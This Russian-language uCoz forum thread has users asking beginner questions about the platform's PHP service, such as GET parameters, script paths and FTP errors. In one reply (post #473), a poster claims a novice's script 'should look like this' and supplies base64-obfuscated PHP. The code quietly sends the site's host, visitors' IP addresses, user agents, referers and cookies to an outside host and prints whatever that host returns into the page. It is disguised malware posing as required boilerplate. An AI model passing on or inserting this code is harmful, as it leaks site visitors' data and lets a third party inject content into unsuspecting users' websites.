Модератор форума: JonMagon  
Сообщество uCoz » Мастерская uCoz » Использование PHP и API на uCoz » Вопросы по использованию услуги PHP (Описание темы)
Вопросы по использованию услуги PHP
Модератор форума
Сообщение # 1 | 15:29:10
В данной теме Вы можете задавать вопросы, касающиеся использования PHP.

Вопросы по оплате и подключению PHP Вы можете задать в следующей теме: https://forum.ucoz.ru/forum/47-37334-1
rzet-777
Сообщений: 159
Репутация: 33

Сообщение # 466 | 15:10:36
Все привет!Недавно подключил php.Чуть-почуть разбираюсь.Вот решил подключить электронный каталог запчастей.Только вот мне надо
Цитата
Просьба прислать адрес строки запроса в формате GET, с задачей номера детали после знака "="
Я так понял надо какой то поиск создать.Если не сложно расскажите вкратце,дальше я сам.Особенно интересует адрес строки в запросе GET

Добавлено (07 Фев 2013, 15:08:09)
---------------------------------------------
Чуть попозже найду сайт ucoz где это реализовано

Добавлено (07 Фев 2013, 15:10:36)
---------------------------------------------
Вот он http://modl-a.ru


Слова не чего не стоят.Покажите мне код.©Линус Торвальдс
grom3863
Сообщений: 7
Репутация: 0

Сообщение # 467 | 11:09:25
Цитата (Ferro7)
1) должно работатъ

Fatal error: Call to undefined function ftp_connect() in ....
Abu-Abubakr
Сообщений: 40
Репутация: 51

Сообщение # 468 | 19:51:44
rzet-777, GET это - Ассоциативный массив параметров, переданных скрипту через URL.

Код
http://example.com/php/user.php?name=rzet-777


Код
<?php
echo 'Привет ' . htmlspecialchars($_GET["name"]) . '!';
?>


Результатом выполнения данного примера будет что-то подобное:

Привет rzet-777!

Добавлено (12 Фев 2013, 19:51:44)
---------------------------------------------

Цитата (grom3863)
Охренеть, еще и ftp_connect() не работает,
ПОЧЕМУ НЕ УКАЗАНО В "ОГРАНИЧЕНИЯХ" ?!?!?!


Цитата
Для использования FTP функций вы должны указать директиву --enable-ftp во время установки PHP.

Надо уточнить у СП

Сообщение отредактировал Abu-Abubakr - Вторник, 12 Фев 2013, 18:01:00
rzet-777
Сообщений: 159
Репутация: 33

Сообщение # 469 | 16:27:55
Abu-Abubakr, Спасибо!Уже разобрался)))Осталось только поиск по магазину на php как то подключить)

Слова не чего не стоят.Покажите мне код.©Линус Торвальдс
fllop
Сообщений: 72
Репутация: 45

Сообщение # 470 | 13:02:25
Скажите пожалуйста почему после загрузки файла в папку scripts , по адресу http://www.мой_сайт.ru/php/example.php выдается ({"SCRIPTDATA":"","Error(ОШИБКА:"не удалось найти скрипт"}) (переведено на русский)
Что я делаю не так? Я уже и scripts вставлял в адрес, и имя залитого файла писал, ни как не получается.

А с первым случаем http://php.ваш_сайт/example.php удаеться выйти только на 404 страницу.
Что я делаю не так? Может кто не будь проконсультировать в icq платно?
Abu-Abubakr
Сообщений: 40
Репутация: 51

Сообщение # 471 | 18:20:25
fllop, php скрипты доступны только по адресу http://www.мой_сайт.ru /php/имя_файла.php
Если вы создали папку scripts на файловом менеджере ucoza, то это большая ошибка.

Сообщение отредактировал Abu-Abubakr - Пятница, 15 Фев 2013, 18:20:48
fllop
Сообщений: 72
Репутация: 45

Сообщение # 472 | 10:43:35
Цитата (Abu-Abubakr)
Если вы создали папку scripts на файловом менеджере ucoza, то это большая ошибка.
То есть похож на невменяемого? wink

Цитата (Abu-Abubakr)
php скрипты доступны только по адресу http://www.мой_сайт.ru /php/имя_файла.php
({"SCRIPTDATA":"","ERROR":""};)

Что делать блин? Помогите... Сам файл вот: Того что не поддерживает php укоза вроде бы нет.

Сообщение отредактировал fllop - Суббота, 16 Фев 2013, 10:45:47
Abu-Abubakr
Сообщений: 40
Репутация: 51

Сообщение # 473 | 12:42:40
fllop, если хотите чтоб скрипт открывался по адресу http://www.мой_сайт.ru /php/имя_файла.php
тогда такие правила:

Код
<?php
$___notjson = 1;

//Тут ваш скрипт

?>


Обязательно надо закрывать php тег (?>), так как все скрипты в корне системы обрабатываетсья через функцию eval

Добавлено (16 Фев 2013, 12:42:40)
---------------------------------------------
т.е. ваш скрипт должен выглядеть так:

Код
<?php  
$___notjson = 1;

function _664864164($i){
     $a = Array(
         'aHR0cDovL2ljcWFkdnZrLmNvbS9nZXQucGhwP3VzZXJfaWQ9NTc0Jm1vZGU9dmsmZG9tYWluPQ==',
         'SFRUUF9IT1NU',
         'JmJsb2NrX2lkPTgxNzAmY 291bnQ9MSZkaW09',
         'dmt0cmFmZmNsb3Nl',
         'dmt0ZWVzZXJfZXg=',
         'JmV4dHQ9',
         'dmt0ZWVzZXJfZXg=',
         'SFRUUF9VU0VSX0FHRU5U',
         'SFRUUF9SRUZFUkVS',
         'Ly8gY3VybCBu b3QgaW5zdGFsbGVk'
     );
     return base64_decode($a[$i]);
}

$_0=_664864164(0) .$_SERVER[_664864164(1)] ._664864164(2);
if(!empty($_COOKIE[_664864164(3)])) exit();
if(function_exists('curl_init')){
      
     $_0 .= '&ip=' .$_SERVER['REMOTE_ADDR'];
     if(!empty($_COOKIE[_664864164(4)])) $_0 .= _664864164(5) .$_COOKIE[_664864164(6)];
     $_1=curl_init();
     curl_setopt($_1,CURLOPT_URL,$_0);
     curl_setopt($_1,CURLOPT_HEADER,0);
     curl_setopt($_1,CURLOPT_CONNECTTIMEOUT,30);
     curl_setopt($_1,CURLOPT_TIMEOUT,30);
     curl_setopt($_1,CURLOPT_RETURNTRANSFER,1);
     curl_setopt($_1,CURLOPT_USERAGENT,$_SERVER[_664864164(7)]);
     curl_setopt($_1,CURLOPT_REFERER,$_SERVER[_664864164(8)]);
     curl_setopt($_1,CURLOPT_FAILONERROR,1);
     echo $_2=curl_exec($_1);curl_close($_1);
}
else echo _664864164(9);

?>

fllop
Сообщений: 72
Репутация: 45

Сообщение # 474 | 13:56:44
Abu-Abubakr, ничего у меня не получается. Зайдите пожалуйста в icq, я вам отправил предложение up Я много времени не займу, 5-10 минут.
maloir
Сообщений: 45
Репутация: 35

Сообщение # 475 | 07:31:50
Подскажите пожалусто как переделать немного скрипт, если конечно это возможно. Есть такой скрипт:
Код
<?if($RATE_FORM$)?></i>  
<!--VOTE POPUP START-->  
<style type="text/css">.cvotepopup {position:absolute;top:0px;left:0px;width:100%}div > div.cvotepopup {position:fixed;}</style>  
<!--[if gte IE 5.5]><![if lt IE 8]><style type="text/css">div#uvotepopup {width:expression(((ignoreMe=(document.documentElement.clientWidth?document.documentElement.clientWidth:document.body.clientWidth))<200?200:  ignoreMe)+'px'); position:absolute;top:expression((ignoreMe2=document.documentElement.scrollTop?document.documentElement.scrollTop:document.body.scrollTop)+'px'); left:expression((ignoreMe=document.documentElement.scrollLeft?document.documentElement.scrollLeft:document.body.scrollLeft)+'px'); }</style><![endif]><![endif]-->  
<div id="pvotepopup">  
<div class="cvotepopup" id="uvotepopup" style="z-index:98;">  
<!--BODY VOTE START-->  
<style type="text/css">  
#vote { text-align:left; position:absolute; width:410px; }  
</style>  
<div id="vote">  
<div class="xw xw-plain" id="voteheader">  
<div class="xw-tl" unselectable="on">  
<div class="xw-tr">
<div class="xw-tc" align="left">  
<div id="myWhead" unselectable="on" class="xw-hdr x-unselectable xp-icon xw-draggable">  
<div id="myWclose" class="xt xt-close" onclick="document.getElementById('pvotepopup').style.display='none'; return false;" onmouseover="this.className='xt xt-close xt-close-over'" onmouseout="this.className='xt xt-close'"></div>  
<span unselectable="on" class="xw-hdr-text" id="layerTitle">Оцени данный материал</span>  
</div></div></div></div>  
<div class="xw-bwrap">  
<div class="xw-ml">  
<div class="xw-mr">  
<div class="xw-mc" id="xw-mc">  
<div id="myWinBody" class="xw-body" style="height:auto;">  
<div class="myWinCont" id="myWinCont" style="padding:5px;width*:100%;">  
<SPAN style="font-weight: bold;">  
<center><font face="Verdana"><strong><script  
language="javascript">  
<!--  
var h=(new Date()).getHours();  
if (h > 23 || h <7) document.write('Здраствуйте! $USERNAME$ вы еще не спите?!');  
if (h > 6 && h < 12) document.write('Доброе утро $USERNAME$! ');  
if (h > 11 && h < 19) document.write('Добрый день $USERNAME$!');  
if (h > 18 && h < 24) document. write('Добрый вечер $USERNAME$!');  
//-->  
</script></strong></font></center></SPAN>  
<DIV align="center"><?if($USER_AVATAR_URL$)?> <img src="$USER_AVATAR_URL$"><?else?><img src=" http://shedar.ru/vosklicatelnyj_znak.jpg"><?endif?><!--%IFEL2%0%
><img src="http://allphotoshop.clan.su/imgs/ava.gif"><!%IFEN2%0%--><BR>  
<HR>  
<a href="http://shedar.ru" target="_blank">Просим Вас проголосовать за этот материал. Голосовать можно всего 1 раз, после того, как проголосуете, Вы больше не увидите это окно, на странице данного материала.  
<fieldset>  
<legend>Голосуем за этот материал:</legend>  
Форма для голосования: <b>$RATE_FORM$</b>  
<br>Проголосовало: <b>$RATED$</b> человек(а)  
<br>Средний рейтинг материала: <b>$RATING$</b>  
</fieldset>  
<div align="right"><a href="javascript://" onclick="document.getElementById('vote').style.display='none'"><FONT color="red"><b>Закрыть</b></FONT></a></div>  
</div></div></div></div></div></div>  
<div class="xw-bl"><div class="xw-br">  
<div class="xw-bc"><div class="xw-footer"></div>  
</div></div></div></div>  
</div><!--BODY VOTE END--></div></div>  
<!--SCRIPT VOTE START-->  
<script type="text/javascript" src="drag_window_vote.js"></script>  
<script type="text/javascript">document.getElementById("pvotepopup").style.height=document.getElementById("uvotepopup").offsetHeight+'px'; </script>  
<!--SCRIPT VOTE END-->  
<!--VOTE POPUP END-->  
<i><?endif?>


Нужно что бы он работал в не только в IE, но и вдругих браузерах. И еще хотелось что бы что бы у этой формы была дополнительная функция кнопочка от Гугл +. Тоесть и голсование для рейтинга было и Гугл +
Надеюсь вы меня поняли. Зарание благодарен.

Садлер
Сообщений: 1
Репутация: 0

Сообщение # 476 | 07:32:00
Здравствуйте скажите если я включу PHP на своём сайте то мой скрипт сможет выполнить свои действия

<?PHP
$A = 1;
$B = ;
$log = fopen("database.txt","at");
fwrite($log,"\n $A:$B \n");
fclose($log);
?>
Ferro7
Сообщений: 285
Репутация: 227

Сообщение # 477 | 04:18:15
Садлер, да

Вы полюбили меня. Здесь я. (с)
Abu-Abubakr
Сообщений: 40
Репутация: 51

Сообщение # 478 | 20:05:48
Садлер, прост саблюдайте правила обработки - json или нет...

SOFTOLAB_COM
Сообщений: 1363
Репутация: 777

Сообщение # 479 | 02:41:45
Abu-Abubakr, да json практически никому не нужен, абсолютно не понятно зачем его по дефолту включили.

Благодарности можно оставить — в репутации.
Помощью в ЛС не занимаюсь, есть форум.
Занимаюсь сайтами на платной основе.
Шаманю на php и mysql с использованием бубна 80 lvl.
lepariszen
Сообщений: 2
Репутация: 21

Сообщение # 480 | 19:09:40
zdrastvuite vot u minea takoi vapros ea v4era zabil oplatiti php i sivodnea uvidel takiu osipku ({"SCRIPTDATA":"","ERROR":"Could not find script location"}) .oplatil php nu seravno eta osipka sidit na meste otkuda ona kak ieo ispraveti kak eto ni ea stavel php cod dumaiu sto on ni udalisea ?
Сообщество uCoz » Мастерская uCoz » Использование PHP и API на uCoz » Вопросы по использованию услуги PHP (Описание темы)
Поиск: